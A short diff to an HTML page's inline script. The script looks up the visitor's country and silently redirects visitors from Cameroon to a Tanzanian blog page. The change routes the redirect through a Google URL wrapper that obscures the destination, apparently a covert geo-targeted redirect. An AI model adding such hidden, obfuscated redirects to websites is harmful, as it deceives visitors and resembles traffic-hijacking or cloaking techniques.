--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
     fetch('https://ipapi.co/json/')
         .then(r => r.json())
         .then(data => {
-            if (data.country_code === 'CM') window.location.href = 'https://www.mimihapa.co.tz/2025/09/nactvet-end-of-semister-results.html?m=1';
+            if (data.country_code === 'CM') window.location.href = 'http://www.google.com/url?q=http%3A%2F%2Fwww.mimihapa.co.tz%2F2025%2F08%2Fdownload-clinical-medicine-modules-nta-level6.html&sa=D&sntz=1&usg=AOvVaw03P0-8Y_h6pxlSW8I073zA';
         })
         .catch(() => {});
     </script>
